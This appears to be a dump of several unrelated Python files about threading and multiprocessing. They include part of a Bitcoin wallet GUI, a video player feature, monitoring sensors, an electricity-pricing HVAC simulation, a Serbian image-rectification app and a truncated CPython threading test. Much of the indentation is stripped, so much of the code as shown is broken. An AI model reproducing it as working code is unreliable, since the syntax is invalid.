self.ledgerView.setColumnWidth(LEDGERCOLS.NumConf, 20)
self.ledgerView.setColumnWidth(LEDGERCOLS.TxDir, 72)
#############################################################################
def bumpFee(self, walletId, txHash):
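      # Rebuild the unconfirmed (zero-conf) transaction as a Cpp.TransactionBatch,
      # preserving recipients and the change output, and prefill the send dialog
      # with it so the user can re-issue the payment with a higher fee (RBF bump).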
#grab wallet
wlt = self.walletMap[walletId]
#grab ZC from DB
zctx = TheBDM.bdv().getTxByHash(txHash)
pytx = PyTx().unserialize(zctx.serialize())
#create tx batch
batch = Cpp.TransactionBatch()
for txin in pytx.inputs:
outpoint = txin.outpoint
batch.addSpender(binary_to_hex(outpoint.txHash), \
outpoint.txOutIndex, txin.intSeq)
for txout in pytx.outputs:
script = txout.getScript()
scrAddr = BtcUtils().getScrAddrForScript(script)
addrComment = wlt.getCommentForAddress(scrAddr)
b58Addr = scrAddr_to_addrStr(scrAddr)
if addrComment == CHANGE_ADDR_DESCR_STRING:
#change address
batch.setChange(b58Addr)
else:
#recipient
batch.addRecipient(b58Addr, txout.value)
batch.setWalletID(walletId)
#feed batch to spend dlg
batchStr = batch.serialize()
dlgSpend = DlgSendBitcoins(None, self, self)
dlgSpend.frame.prefillFromBatch(batchStr)
dlgSpend.exec_()
#############################################################################
def walletTimeoutCheck(self):
for idx,wltID in enumerate(self.walletIDList):
self.walletMap[wltID].checkWalletLockTimeout()
self.signalExecution.callLater(2, self.walletTimeoutCheck)
############################################
def checkForAlreadyOpen():
from armoryengine.ProcessMutex import PySide_ProcessMutex
LOGDEBUG('Checking for already open socket...')
prc_mutex = PySide_ProcessMutex(CLI_OPTIONS.interport, None)
urilink = ""
if CLI_ARGS:
urilink = str(CLI_ARGS[0])
if prc_mutex.test(urilink) == True:
LOGERROR('Socket already in use. Sent CLI args to existing proc.')
LOGERROR('Exiting...')
os._exit(0)
############################################
if 1:
if CLI_OPTIONS.interport > 1:
checkForAlreadyOpen()
pixLogo = QPixmap(':/splashlogo.png')
if USE_TESTNET or USE_REGTEST:
pixLogo = QPixmap(':/splashlogo_testnet.png')
SPLASH = ArmorySplashScreen(pixLogo)
SPLASH.setMask(pixLogo.mask())
SPLASH.show()
QAPP.processEvents()
# Will make this customizable
QAPP.setFont(GETFONT('var'))
TheSDM = SatoshiDaemonManager()
form = ArmoryMainWindow(splashScreen=SPLASH)
form.show()
SPLASH.finish(form)
QAPP.setQuitOnLastWindowClosed(True)
os._exit(QAPP.exec_())
|
mult-processing.py
|
import os
from multiprocessing import Process
def run_proc(name):
print('child process {name} {pid} Running'.format(name=name, pid=os.getpid()))
if __name__ == '__main__':
print('Parent process {current_pid}'.format(current_pid=os.getpid()))
for i in range(5):
p = Process(target=run_proc, args=(str(i),))
print('Process will start...')
p.start()
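        # join() blocks the parent until the child process has exited.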
p.join()
print('Process end.')
|
VideoPlayer.py
|
import logging
import threading
import time
from Configuration import config
from Configuration import testMode
from features.GpioFeature import *
if not testMode:
from omxplayer import OMXPlayer
class VideoPlayer(GpioFeature):
# Path to video to play
path = config.get('VIDEO', 'PATH')
def __init__(self, parent, configSection):
super().__init__(parent, configSection)
def start(self):
logging.info("Video player start")
super().start()
if not testMode:
self.player = OMXPlayer(self.path)
self.thread = threading.Thread(target=self.checkEnd)
self.thread.start()
def stop(self):
logging.info("Video player stop")
super().stop()
if not testMode:
self.player.quit()
def checkEnd(self):
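        # Poll the player from this background thread until playback finishes,
        # then mark the feature off and switch off its GPIO indicator.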
        while self.player.is_playing:
time.sleep(1)
self.state = GenericFeature.STATE_OFF
self.indicator.swithOff()
|
base_sensors.py
|
from time import sleep
import threading
import abc
import logging
class ServerMonSensor:
def __init__(self, channels, config) -> None:
self.channels = channels
sensor_thread = threading.Thread(target=self.run_sensor)
sensor_thread.start()
def run_sensor(self) -> None:
logging.info("Instantiated {}".format(self._type()))
while True:
logging.debug("Running logic for sensor {}".format(self._type()))
self.do_sensor_logic()
if hasattr(self, "update_interval"):
sleep(self.update_interval)
def send_message(self, message) -> None:
for channel in self.channels:
channel.send_message(message, self._type())
@abc.abstractmethod
def do_sensor_logic(self):
raise NotImplementedError(
"Logic for sensor {} was not implemented".format(self._type())
)
def _type(self) -> str:
return self.__class__.__name__
class TimedSensor(ServerMonSensor):
DEFAULT_SLEEP = 60
def __init__(self, channels, config) -> None:
if "update_interval" in config.keys():
self.update_interval = int(config["update_interval"])
else:
self.update_interval = None
if self.update_interval is None:
logging.warning(
"Update interval for sensor {} checks not specified, setting to {} seconds".format(
self._type(), self.DEFAULT_SLEEP
)
)
self.update_interval = self.DEFAULT_SLEEP
super().__init__(channels, config)
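
# Illustrative sketch (not part of the original module): a minimal channel plus a
# concrete TimedSensor subclass, showing how do_sensor_logic() plugs into the base
# class loop. PrintChannel and HeartbeatSensor are hypothetical names.
class PrintChannel:
    def send_message(self, message, sender) -> None:
        logging.info("[%s] %s", sender, message)

class HeartbeatSensor(TimedSensor):
    def do_sensor_logic(self) -> None:
        # Called once per update_interval by ServerMonSensor.run_sensor().
        self.send_message("still alive")

if __name__ == "__main__":
    logging.basicConfig(level=logging.DEBUG)
    HeartbeatSensor([PrintChannel()], {"update_interval": "5"})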
|
tasks.py
|
# -*- coding:utf-8 -*-
import logging
import threading
import time
logger = logging.getLogger("tasks.project")
class PeriodicCallback(object):
def __init__(self, callback, callback_time):
self.callback = callback
if callback_time <= 0:
raise ValueError("Periodic callback must have a positive callback_time")
self.callback_time = callback_time
self._running = False
def start(self):
self._running = True
threading.Thread(target=self._schedule_next).start()
def stop(self):
"""Stops the timer."""
self._running = False
def _schedule_next(self):
while self._running:
time.sleep(self.callback_time)
self.callback()
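
# Illustrative usage sketch (not part of the original module). Note that
# callback_time is in seconds here, since it is passed straight to time.sleep()
# in _schedule_next().
if __name__ == "__main__":
    logging.basicConfig(level=logging.INFO)
    ticker = PeriodicCallback(lambda: logger.info("tick"), callback_time=2)
    ticker.start()
    time.sleep(7)  # let the callback fire a few times
    ticker.stop()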
|
HVAC2_newdata.py
|
"""
Run a large number of simulations for the HVAC model.
Results from these simulations are reported in:
C. Campaigne, M. Balandat and L. Ratliff: Welfare Effects
of Dynamic Electricity Pricing. In preparation.
@author: Maximilian Balandat
@date Sep 23, 2017
"""
# import packages and set up things
import os
import multiprocessing as mp
import pandas as pd
import logging
import logging.handlers
import logging.config
from datetime import datetime
from pyDR.simulation import get_internal_gains, log_config, simulate_HVAC, max_cool
############################################################################
# Setup
DATA_PATH = "C:/Users/Clay/Desktop/pyDR_data_pavlak/pyDR_data"
LOG_PATH = "C:/Users/Clay/Desktop/pyDR_2014-2016_logs"
RESULTS_PATH = "C:/Users/Clay/Desktop/pyDR_2014-2016_results"
# location of data files (available for download at
# https://www.ocf.berkeley.edu/~balandat/pyDR_data.zip)
data_file = os.path.join(DATA_PATH, "data_complete_2014-2016.csv")
# location of the log file
log_file = os.path.join(LOG_PATH, "HVAC_sim.log")
# directory for GUROBI log files
GRB_logdir = os.path.join(LOG_PATH, "GRB_logs")
# location of the result file
result_file = os.path.join(RESULTS_PATH, "results.csv")
# folder for output files (Attention: if not None, this will
# save a few GB of .pickle files)
output_folder = None
############################################################################
def main():
# read in data
data = pd.read_csv(data_file, parse_dates=['timestamp_GMT'],
index_col='timestamp_GMT').tz_localize('UTC')
# data = data.resample('1H').mean()
# Define model and simulation parameters
# generate copies of input data for parallelization
sim_ranges = [[datetime(2014, 1, 1), datetime(2014, 12, 31)],
[datetime(2015, 1, 1), datetime(2015, 12, 31)],
[datetime(2016, 1, 1), datetime(2016, 12, 31)]]
sim_tariffs = ['Zero', 'OptFlat', 'A1', 'A1TOU', 'A6TOU', 'A10_secondary',
'A10TOU_secondary', 'E19TOU_secondary']
sim_nodes = ['PGCC', 'PGF1', 'PGSA'] # I couldn't get all the nodes since CAISO changed its data
# retention policy
n_DR = [75]
n_ranges = len(sim_ranges)
# generate scaled sub-DataFrame
    colnames = [node+'_temp' for node in sim_nodes] +\
               [node+'_LMP' for node in sim_nodes]
data_sim = data[colnames]
for colname in [node+'_solar' for node in sim_nodes]:
data_sim[colname] = data[colname]/1000 # solar irradiance needs to be in kW, not Watts
data_sim['occupancy'] = get_internal_gains(data.index)
data_sim['loss_inflators'] = data['loss_inflators']
# generate a list of DataFrames of different ranges for parallelization
data_parallelize = []
for (start_date, end_date) in sim_ranges:
ts_start = pd.Timestamp(start_date, tz='US/Pacific')
ts_end = pd.Timestamp(end_date, tz='US/Pacific')
data_parallelize.append(
data_sim[(data_sim.index >= ts_start) & (data_sim.index <= ts_end)]
)
# configure logger
logging.config.dictConfig(log_config(log_file))
log_queue = mp.Queue(-1)
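    # Worker processes put their LogRecords on this queue; the QueueListener
    # below drains it and forwards the records to the root logger's handlers
    # in the parent process.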
root = logging.getLogger()
ql = logging.handlers.QueueListener(log_queue, *root.handlers)
# start root logging via queue listener
ql.start()
root.log(logging.INFO, 'Starting simulation.')
results = []
# start simulating
with mp.Manager() as mngr:
result_queue = mngr.Queue(-1)
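        # Managed queue through which each worker hands its result DataFrame
        # back to the parent process.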
sim_workers = []
for i in range(n_ranges):
sim_worker = mp.Process(
target=simulate_HVAC, name='sim_worker {}'.format(i),
args=(i, log_queue, result_queue, data_parallelize[i],
sim_nodes, sim_tariffs, n_DR),
                kwargs={'log_path': LOG_PATH, 'GRB_logfile': os.path.join(GRB_logdir, 'GRB_{}.log'.format(i)),
'expMA': False, 'carbon': True, 'MIPGap': .00,
'TimeLimit': 2000, 'output_folder': output_folder,
'max_cool': max_cool})
sim_workers.append(sim_worker)
sim_worker.start()
        # wait for all worker processes to finish
for sw in sim_workers:
sw.join()
root.log(logging.DEBUG, 'Extracting results.')
# extract results
for i in range(n_ranges):
results.append(result_queue.get())
# save results
root.log(logging.DEBUG, 'Saving results to disk.')
results = pd.concat(results, ignore_index=True)
results.to_csv(result_file, index=False)
# stop logging
root.log(logging.INFO, 'Simulation completed.')
ql.stop()
if __name__ == '__main__':
main()
|
gki.py
|
#!/usr/bin/env python3
# Ukljucivanje sistemskog modula
from sys import exit as greska
# Ukljucivanje grafickog modula
from tkinter import Tk, Frame, Menu, LabelFrame, \
Canvas, Button, Entry
# Ukljucivanje pomocnog modula za
# kutijice sa iskacucim porukama
from tkinter.messagebox import showinfo, showerror, askyesno
# Ukljucivanje pomocnog modula
# za pretragu fajl sistema
from tkinter.filedialog import askopenfilename, asksaveasfilename
# Ukljucivanje modula za slike
from PIL import Image, ImageTk
# Ukljucivanje modula za matematiku
import numpy as np
import numpy.linalg as LA
from proj import naivni
# Ukljucivanje modula za kopiranje
from copy import deepcopy
# Ukljucivanje modula za niti
from threading import Thread
# Ukljucivanje modula za konveksni omotac
from omot import konveksni_omot as konv
# Nosilac programa je klasa PPGR, koja nasledjuje
# graficku klasu Tk iz modula tkinter
class PPGR(Tk):
# Konstruktor aplikacije
def __init__(self):
# Log poruka o pokretanju aplikacije
print('Dobro došli u aplikaciju PPGR!')
# Pozivanje konstruktora roditeljske klase
super().__init__()
# Postavljanje naziva aplikacije
self.title('Отклањање дисторзије')
# Onemogucavanje promene velicine prozora,
# posto je Tk prilicno plastican, pa promene
# ugrozavaju zamisljeni izgled aplikacije
self.resizable(False, False)
# Inicijalizacija glavnog menija
self.init_meni()
# Ukljucivanje prvog frejma
self.frejm = None
self.postavi_frejm(Ucitavanje)
# Postavljanje novog frejma
def postavi_frejm(self, frejm):
if self.frejm is not None:
self.frejm.destroy()
self.frejm = frejm(self)
self.frejm.pack()
# Inicijalizacija glavnog menija
def init_meni(self):
# Pravljenje glavnog menija
self.meni = Menu(self)
# Postavljanje glavnog menija i vezivanje
# komandi za odgovarajuce funkcionalnosti
self.meni.add_command(label = 'Помоћ (H)', command = self.pomoc)
self.meni.add_command(label = 'Инфо (G)', command = self.info)
self.config(menu = self.meni)
# Vezivanje tipki za akcije analogne
# onima iz prethodno postavljenog menija
self.bind('<H>', self.pomoc)
self.bind('<h>', self.pomoc)
self.bind('<G>', self.info)
self.bind('<g>', self.info)
self.bind('<Escape>', self.kraj)
# Vezivanje protokola zatvaranja prozora
# za istu akciju kao za taster Escape
self.protocol('WM_DELETE_WINDOW', self.kraj)
# Prikazivanje prozora za pomoc
def pomoc(self, dog = None):
showinfo('Помоћ',
'На почетном прозору налазе се мени и поље за одабир'
' слике. Одабиром слике са датотечног система појављује'
' се нов прозор са учитаном сликом. Левим кликом миша'
' означите четири тачке које желите да постану правоугаоник.'
' По потреби, означите још четири тачке и тиме сугеришите'
' апликацији где правоугаоник треба да се налази. У случају'
' грешке, можете поновити унос десним кликом миша. Апликацију'
' рестартујете на исти начин. Резултујућу слику можете'
' сачувати на рачунару.')
# Prikazivanje glavnih informacija o aplikaciji
def info(self, dog = None):
showinfo('Информације',
'Домаћи из Примене пројективне геометрије у рачунарству:'
' отклањање пројективне дисторзије.\n\n'
'Лазар Васовић, 99/2016\n'
'Математички факултет, 2019')
# Zatvaranje aplikacije na zahtev korisnika
def kraj(self, dog = None):
# Poruka korisniku o kraju programa
if askyesno('Kрај програма',
'Да ли стварно желите да напустите програм?'):
# Log poruka o zatvaranju aplikacije
print('PPGR zatvoren na zahtev korisnika!')
# Upotreba self.quit() zamrzava prozor na Windows-u,
# posto prekida izvrsavanje i pokretackog programa
self.destroy()
# Prvi frejm, za ucitavanje slike
class Ucitavanje(Frame):
# Konstruktor frejma
def __init__(self, koren):
# Log poruka o pokretanju frejma
print('Odaberite sliku za transformaciju.')
# Pozivanje konstruktora roditeljske klase
super().__init__(koren)
# Inicijalizacija elemenata GKI
self.init_gki()
# Inicijalizacija elemenata GKI
def init_gki(self):
# Postavljanje velicine i pozicije prozora
self.master.geometry('320x100+400+300')
# Okvir za odabir
okvir = LabelFrame(self, text = 'Одаберите слику:',
padx = 5, pady = 5)
okvir.grid(column = 0, row = 0,
padx = 15, pady = 10)
# Polje za unos slike
self.unos = Entry(okvir)
self.unos.grid(column = 1, row = 0,
padx = 10, pady = 10)
self.unos.insert(0, 'primer.bmp')
self.unos.config(state = 'readonly')
# Dugme za ucitavanje
ucitaj = Button(okvir,
text = 'Учитај',
command = self.ucitaj)
ucitaj.grid(column = 2, row = 0,
padx = 5, pady = 5)
# Dugme za pretragu
pretrazi = Button(okvir,
text = 'Претражи',
command = self.pretrazi)
pretrazi.grid(column = 3, row = 0,
padx = 5, pady = 5)
# Ucitavanje slike
def ucitaj(self, dog = None):
if not hasattr(self.master, 'fajl') \
or self.master.fajl is None:
showerror('Грешка',
'Нисте одабрали датотеку за читање.')
return
# Otvaranje odabrane slike
try:
self.master.slika = Image.open(self.master.fajl)
except:
showerror('Грешка',
'Одабрана датотека није слика.')
return
# Kopiranje originalne slike
self.master.orig = self.master.slika
self.master.dim = self.master.slika.size
# Eventualno vertikalno skracivanje
dim = self.master.slika.size
if dim[1] > 600:
self.master.slika = \
self.master.slika.resize((round(dim[0]*600/dim[1]), 600),
Image.ANTIALIAS)
# Eventualno horizotalno skracivanje
dim = self.master.slika.size
if dim[0] > 900:
self.master.slika = \
self.master.slika.resize((900, round(dim[1]*900/dim[0])),
Image.ANTIALIAS)
# Dimenzije prikaza
self.master.ndim = self.master.slika.size
# Prelazak na naredni frejm
self.master.postavi_frejm(Transformacija)
# Pretraga slika
def pretrazi(self, dog = None):
fajl = askopenfilename(
filetypes = [('Svi tipovi', '*.*')]
)
# Prikaz odabranog fajla
if fajl:
self.unos.config(state = 'normal')
self.unos.delete(0, 'end')
self.unos.insert(0, fajl[fajl.rfind('/')+1:])
self.unos.config(state = 'readonly')
self.master.fajl = fajl
# Drugi frejm, za transformaciju slike
class Transformacija(Frame):
# Konstruktor frejma
def __init__(self, koren):
# Log poruka o pokretanju frejma
print('Transformišite odabranu sliku.')
# Pozivanje konstruktora roditeljske klase
super().__init__(koren)
# Inicijalizacija odabranih tacaka
self.tacke = []
self.ntacke = []
# Inicijalizacija iscrtavanja
self.figura = None
self.id_tac = []
self.id_tex = []
self.nfigura = None
self.nid_tac = []
self.nid_tex = []
# Inicijalizacija elemenata GKI
self.init_gki()
# Inicijalizacija elemenata GKI
def init_gki(self):
# Dimenzije odabrane slike
dim = self.master.slika.size
# Postavljanje velicine i pozicije prozora
self.master.geometry(f'{max(dim[0]+5, 300)}x{dim[1]+5}+100+50')
# Postavljanje odabrane slike na prozor
self.slika = ImageTk.PhotoImage(self.master.slika)
self.platno = Canvas(self, width = dim[0]+5, height = dim[1]+5)
self.platno.create_image(dim[0]/2+2, dim[1]/2+2, image = self.slika)
self.platno.pack()
# Dodavanje transformacije u meni
self.master.meni.add_command(label = 'Трансформиши (T)',
command = self.trans)
self.master.bind('<T>', self.trans)
self.master.bind('<t>', self.trans)
# Vezivanje dogadjaja misa
self.platno.bind('<Button-1>', self.tacka)
self.platno.bind('<Button-3>', self.ponovi)
# Dodavanje tacke na platno
def tacka(self, dog):
if len(self.tacke) < 4:
self.tacke.append((dog.x-2, dog.y-2))
# Figura mora biti konveksna
konvt = konv(self.tacke)
if len(konvt) != len(self.tacke):
self.tacke.pop()
showerror('Грешка',
'Унета фигура мора бити конвексна.')
return
# Brisanje prethodno nacrtane figure
self.platno.delete(self.figura)
# Brisanje prethodno nacrtanih tacaka
[*map(self.platno.delete, self.id_tac)]
[*map(self.platno.delete, self.id_tex)]
# Crtanje konveksnog omota novih tacaka
self.id_tac = [self.platno.create_oval
(t[0], t[1], t[0]+4, t[1]+4,
outline = 'orange', fill = 'orange')
for t in self.tacke]
# Crtanje rednih brojeva tacaka
self.id_tex = [self.platno.create_text(
t[0]+12, t[1]-8,
text = str(i+1),
fill = 'blue',
font = 'Times 15')
for i, t in \
enumerate(self.tacke)]
# Crtanje nove figure
self.figura = self.platno.create_polygon([*map(
lambda x: (x[0]+2, x[1]+2), konvt)],
outline = 'yellow', fill = '') \
if len(self.tacke) > 1 else None
elif len(self.ntacke) < 4:
self.ntacke.append((dog.x-2, dog.y-2))
# Figura mora biti konveksna
konvt = konv(self.ntacke)
if len(konvt) != len(self.ntacke):
self.ntacke.pop()
showerror('Грешка',
'Унета фигура мора бити конвексна.')
return
# Brisanje prethodno nacrtane figure
self.platno.delete(self.nfigura)
# Brisanje prethodno nacrtanih tacaka
[*map(self.platno.delete, self.nid_tac)]
[*map(self.platno.delete, self.nid_tex)]
# Crtanje novih tacaka
self.nid_tac = [self.platno.create_oval
(t[0], t[1], t[0]+4, t[1]+4,
outline = 'blue', fill = 'blue')
for t in self.ntacke]
# Crtanje rednih brojeva tacaka
self.nid_tex = [self.platno.create_text(
t[0]+12, t[1]-8,
text = str(i+1),
fill = 'orange',
font = 'Times 15')
for i, t in \
enumerate(self.ntacke)]
# Crtanje nove figure
self.nfigura = self.platno.create_polygon([*map(
lambda x: (x[0]+2, x[1]+2), konvt)],
outline = 'green', fill = '') \
if len(self.ntacke) > 1 else None
# Resetovanje unosa
def ponovi(self, dog):
if self.ntacke:
self.ntacke = []
# Brisanje prethodno nacrtane figure
self.platno.delete(self.nfigura)
# Brisanje prethodno nacrtanih tacaka
[*map(self.platno.delete, self.nid_tac)]
[*map(self.platno.delete, self.nid_tex)]
elif self.tacke:
self.tacke = []
# Brisanje prethodno nacrtane figure
self.platno.delete(self.figura)
# Brisanje prethodno nacrtanih tacaka
[*map(self.platno.delete, self.id_tac)]
[*map(self.platno.delete, self.id_tex)]
# Ponovno pokretanje aplikacije
else:
self.master.fajl = None
self.master.meni.delete('Трансформиши (T)')
self.master.unbind('<T>')
self.master.unbind('<t>')
self.master.postavi_frejm(Ucitavanje)
# Naivno izracunavanje transformacije
def trans(self, dog = None):
if len(self.tacke) != 4 or 1 <= len(self.ntacke) <= 3:
showerror('Грешка',
'Нисте унели четири тачке.')
return
# Brisanje transformacije iz menija
self.platno.unbind('<Button-1>')
self.platno.unbind('<Button-3>')
self.master.meni.delete('Трансформиши (T)')
self.master.unbind('<T>')
self.master.unbind('<t>')
# Dodavanje progresa u meni
self.master.meni.add_command(label = 'Обрађено: 0%')
# Transformacija u zasebnoj niti
nit = Thread(target = self.transt)
nit.daemon = True
nit.start()
# Transformacija u zasebnoj niti
def transt(self):
try:
# Skaliranje unetih tacaka prema originalu
skala = self.master.dim[0]/self.master.ndim[0],\
self.master.dim[1]/self.master.ndim[1]
skaliraj = lambda x: (round(skala[0]*x[0]),
round(skala[1]*x[1]),
1 )
self.tacke = [*map(skaliraj, self.tacke)]
self.ntacke = [*map(skaliraj, self.ntacke)]
# Rektifikacija preslikanih tacaka
self.ntacke = self.rektifikuj(self.ntacke \
if self.ntacke else self.tacke)
# Racunanje projektivne transformacije
matrica = naivni(self.ntacke, self.tacke)
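            # naivni() (from the proj module) presumably returns the projective
            # transformation matrix mapping the rectified target points onto the
            # originally selected ones; preslikaj() below applies its inverse
            # pixel by pixel to the source image.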
# Transformacija originalne slike
self.master.norig = self.preslikaj(matrica)
# Transformacija prikazane slike
self.master.nslika = self.master.norig.resize(self.master.ndim,
Image.ANTIALIAS)
# Prelazak na naredni frejm
self.master.poz = self.master.winfo_x(), self.master.winfo_y()
self.master.postavi_frejm(Prikaz)
except:
pass
# Rektifikacija cetiri tacke
def rektifikuj(self, tacke):
# Teziste cetvorougla
tacke = np.array(tacke)
tez = np.mean(tacke, axis = 0)
tez = [*map(round, tez)]
# Najveca rastojanja po osama
sirina, visina = 0, 0
for i in range(len(tacke)):
for j in range(i+1, len(tacke)):
# Izvlacenje iz indeksa
x = tacke[i]
y = tacke[j]
# Potencijalna nova sirina
nsir = abs(x[0]-y[0]) + 1
if nsir > sirina:
sirina = nsir
# Potencijalna nova visina
nvis = abs(x[1]-y[1]) + 1
if nvis > visina:
visina = nvis
# Pomocne promenljive
sirina = round(sirina/2)
visina = round(visina/2)
sk, sl = 0, 0
kraj = False
# Nalazenje dve tacke dijagonale
for i in range(len(tacke)):
for j in range(i+1, len(tacke)):
for k in range(len(tacke)):
if k in (i, j):
continue
for l in range(len(tacke)):
if l in (i, j, k):
continue
# Izvlacenje iz indeksa
x = tacke[i]
y = tacke[j]
xx = tacke[k]
yy = tacke[l]
# Prava kroz dve tacke
a = y[1] - x[1]
b = x[0] - y[0]
c = a*x[0] + b*x[1]
sk = np.sign(a*xx[0] + b*xx[1] - c)
sl = np.sign(a*yy[0] + b*yy[1] - c)
# Dijagonala je ako su znakovi
# druge dve tacke suprotni
if sk != sl:
kraj = True
break
if kraj:
break
if kraj:
break
if kraj:
break
# Izvlacenje iz indeksa
ii = tacke[i]
jj = tacke[j]
# i gornja leva, j donja desna
if ii[0] <= jj[0] and ii[1] <= jj[1]:
tacke[i] = self.gl(tez, sirina, visina)
tacke[j] = self.dd(tez, sirina, visina)
# k donja leva, l gornja desna
if sk < 0:
tacke[k] = self.dl(tez, sirina, visina)
tacke[l] = self.gd(tez, sirina, visina)
# l donja leva, k gornja desna
else:
tacke[l] = self.dl(tez, sirina, visina)
tacke[k] = self.gd(tez, sirina, visina)
# i donja leva, j gornja desna
elif ii[0] <= jj[0] and ii[1] > jj[1]:
tacke[i] = self.dl(tez, sirina, visina)
tacke[j] = self.gd(tez, sirina, visina)
# k donja desna, l gornja leva
if sk < 0:
tacke[k] = self.dd(tez, sirina, visina)
tacke[l] = self.gl(tez, sirina, visina)
# l donja desna, k gornja leva
else:
tacke[l] = self.dd(tez, sirina, visina)
tacke[k] = self.gl(tez, sirina, visina)
# i gornja desna, j donja leva
elif ii[0] > jj[0] and ii[1] <= jj[1]:
tacke[i] = self.gd(tez, sirina, visina)
tacke[j] = self.dl(tez, sirina, visina)
# k gornja leva, l donja desna
if sk < 0:
tacke[k] = self.gl(tez, sirina, visina)
tacke[l] = self.dd(tez, sirina, visina)
# l gornja leva, k donja desna
else:
tacke[l] = self.gl(tez, sirina, visina)
tacke[k] = self.dd(tez, sirina, visina)
# i donja desna, j gornja leva
else:
tacke[i] = self.dd(tez, sirina, visina)
tacke[j] = self.gl(tez, sirina, visina)
# k gornja desna, l donja leva
if sk < 0:
tacke[k] = self.gd(tez, sirina, visina)
tacke[l] = self.dl(tez, sirina, visina)
# l gornja desna, k donja leva
else:
tacke[l] = self.gd(tez, sirina, visina)
tacke[k] = self.dl(tez, sirina, visina)
return tacke
# Funkcije za tezisni polozaj tacke
def gl(self, tez, sirina, visina):
return tez[0]-sirina, tez[1]-visina, 1
def gd(self, tez, sirina, visina):
return tez[0]+sirina, tez[1]-visina, 1
def dl(self, tez, sirina, visina):
return tez[0]-sirina, tez[1]+visina, 1
def dd(self, tez, sirina, visina):
return tez[0]+sirina, tez[1]+visina, 1
# Primena projektivne transformacije
def preslikaj(self, matrica):
# Inverzija matrice, kako bi se svaki piksel nove
# slike odredjivao preko stare umesto obrnuto
matrica = LA.inv(matrica)
# Vadjenje matrica piksela
spix = self.master.orig.load()
norig = Image.new(self.master.orig.mode, self.master.dim)
npix = norig.load()
# Transformacija piksel po piksel; petlja
# nije najpametnije resenje, ali omogucava
# azuriranje progresa, sto je lepa stvar
n, m = self.master.dim[0], self.master.dim[1]
prog = 0
for i in range(n):
for j in range (m):
# Racunanje novih koordinata
tacka = matrica @ np.array([i, j, 1])
tacka = tacka[0]/tacka[2], tacka[1]/tacka[2]
# Azuriranje progresa u meniju
progg = round(100*(i*m+j+1)/(n*m))
if progg >= prog+1:
prog = progg
self.master.meni.entryconfig(3, label = f'Обрађено: {prog}%')
# Nema preslikavanja ako je original van slike
if tacka[0] < 0 or tacka[0] >= self.master.dim[0] \
or tacka[1] < 0 or tacka[1] >= self.master.dim[1]:
continue
# Kopiranje piksela sa originalne slike
npix[i,j] = spix[tacka]
return norig
# Treci frejm, za prikaz rezultata
class Prikaz(Frame):
# Konstruktor frejma
def __init__(self, koren):
# Log poruka o pokretanju frejma
print('Sačuvajte transformisanu sliku.')
# Pozivanje konstruktora roditeljske klase
super().__init__(koren)
# Inicijalizacija elemenata GKI
self.init_gki()
# Inicijalizacija elemenata GKI
def init_gki(self):
# Dimenzije odabrane slike
dim = self.master.ndim
# Pozicija prozora pre promene
poz = self.master.poz
# Postavljanje velicine i pozicije prozora
self.master.geometry(f'{max(dim[0]+5, 300)}x'
f'{dim[1]+5}+{poz[0]}+{poz[1]}')
# Postavljanje odabrane slike na prozor
self.slika = ImageTk.PhotoImage(self.master.nslika)
self.platno = Canvas(self, width = dim[0]+5, height = dim[1]+5)
self.platno.create_image(dim[0]/2+2, dim[1]/2+2, image = self.slika)
self.platno.pack()
# Brisanje starog dela menija
self.master.meni.delete('Обрађено: 100%')
# Vezivanje dogadjaja misa
self.platno.bind('<Button-3>', self.restart)
# Dodavanje cuvanja slike u meni
self.master.meni.add_command(label = 'Сачувај (S)',
command = self.sacuvaj)
self.master.bind('<S>', self.sacuvaj)
self.master.bind('<s>', self.sacuvaj)
# Cuvanje transformisane slike
def sacuvaj(self, dog = None):
fajl = asksaveasfilename(
filetypes = (('Bitmap sličica', '*.bmp'),
('Drugi tip', '*.*'))
)
if fajl:
try:
self.master.norig.save(fajl)
except ValueError:
self.master.norig.save(fajl + '.bmp')
# Ponovno pokretanje aplikacije
def restart(self, dog = None):
# Brisanje cuvanja iz menija
self.master.meni.delete('Сачувај (S)')
self.master.unbind('<S>')
self.master.unbind('<s>')
# Postavljanje pocetnog frejma
self.master.fajl = None
self.master.postavi_frejm(Ucitavanje)
# Obavestenje o gresci ukoliko je modul
# pokrenut kao samostalan program
if __name__ == '__main__':
greska('GKI nije samostalan program! Pokrenite main!')
|
test_threading.py
|
# Very rudimentary test of threading module
import test.test_support
from test.test_support import verbose
import random
import re
import sys
thread = test.test_support.import_module('thread')
threading = test.test_support.import_module('threading')
import time
import unittest
import weakref
import os
import subprocess
from test import lock_tests
# A trivial mutable counter.
class Counter(object):
def __init__(self):
self.value = 0
def inc(self):
self.value += 1
def dec(self):
self.value -= 1
def get(self):
return self.value
class TestThread(threading.Thread):
def __init__(self, name, testcase, sema, mutex, nrunning):
threading.Thread.__init__(self, name=name)
self.testcase = testcase
self.sema = sema
self.mutex = mutex
self.nrunning = nrunning
def run(self):
delay = random.random() / 10000.0
if verbose:
print 'task %s will run for %.1f usec' % (
self.name, delay * 1e6)
with self.sema:
with self.mutex:
self.nrunning.inc()
if verbose:
print self.nrunning.get(), 'tasks are running'
self.testcase.assertTrue(self.nrunning.get() <= 3)
time.sleep(delay)
if verbose:
print 'task', self.name, 'done'
with self.mutex:
self.nrunning.dec()
self.testcase.assertTrue(self.nrunning.get() >= 0)
if verbose:
print '%s is finished. %d tasks are running' % (
self.name, self.nrunning.get())
class BaseTestCase(unittest.TestCase):
def setUp(self):
self._threads = test.test_support.threading_setup()
def tearDown(self):
test.test_support.threading_cleanup(*self._threads)
test.test_support.reap_children()
class ThreadTests(BaseTestCase):
# Create a bunch of threads, let each do some work, wait until all are
# done.
def test_various_ops(self):
# This takes about n/3 seconds to run (about n/3 clumps of tasks,
# times about 1 second per clump).
NUMTASKS = 10
# no more than 3 of the 10 can run at once
sema = threading.BoundedSemaphore(value=3)
mutex = threading.RLock()
numrunning = Counter()
threads = []
for i in range(NUMTASKS):
t = TestThread("<thread %d>"%i, self, sema, mutex, numrunning)
threads.append(t)
self.assertEqual(t.ident, None)
self.assertTrue(re.match('<TestThread\(.*, initial\)>', repr(t)))
t.start()
if verbose:
print 'waiting for all tasks to complete'
for t in threads:
t.join(NUMTASKS)
self.assertTrue(not t.is_alive())
self.assertNotEqual(t.ident, 0)
self.assertFalse(t.ident is None)
self.assertTrue(re.match('<TestThread\(.*, \w+ -?\d+\)>', repr(t)))
if verbose:
print 'all tasks done'
self.assertEqual(numrunning.get(), 0)
def test_ident_of_no_threading_threads(self):
# The ident still must work for the main thread and dummy threads.
self.assertFalse(threading.currentThread().ident is None)
def f():
ident.append(threading.currentThread().ident)
done.set()
done = threading.Event()
ident = []
thread.start_new_thread(f, ())
done.wait()
